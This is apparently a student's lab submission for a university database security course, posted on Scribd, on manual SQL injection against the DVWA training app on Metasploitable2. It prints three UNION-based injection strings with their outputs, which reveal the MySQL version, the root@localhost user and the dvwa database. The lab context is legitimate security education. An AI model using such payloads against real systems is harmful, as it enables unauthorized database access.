0% found this document useful (0 votes)
28 views4 pages

Lab - Manual SQL Injection

Uploaded by

khangpmse140793
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
28 views4 pages

Lab - Manual SQL Injection

Uploaded by

khangpmse140793
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

LAB – MANUAL SQL INJECTION

Course: DATABASE SECURITY (DBS401)


Semester: SP24
Class: IA1601
Group:
Members Phạm Minh Khang
(roll numbers):

I. INSTRUCTION:
1. Follow the instruction from PDF attachment, but do not submit it.
2. Submit this Word document!

II. REFLECTION QUESTIONS


1. METASPLOTABLE2
What is SQL platform used for the database?
"5.0.51a-3ubuntu5

2. DVWA
Could you do the SQL injection successfully with “Medium” or “High” DVWA
Security level? Please explain.
It cannot be done because the device already has an input check step, so it
cannot have special characters like %,@,...
Display all the columns field contents in the information_schema user table
(III.10) (screen capture).

3. PASSWORD DECRYPTION
ID: %' or 0=0 union select null, version() #
First name:
Surname: 5.0.51a-3ubuntu5

ID: %' or 0=0 union select null, user() #


First name:
Surname: root@localhost
ID: %' or 0=0 union select null, database() #
First name:
Surname: dvwa

You might also like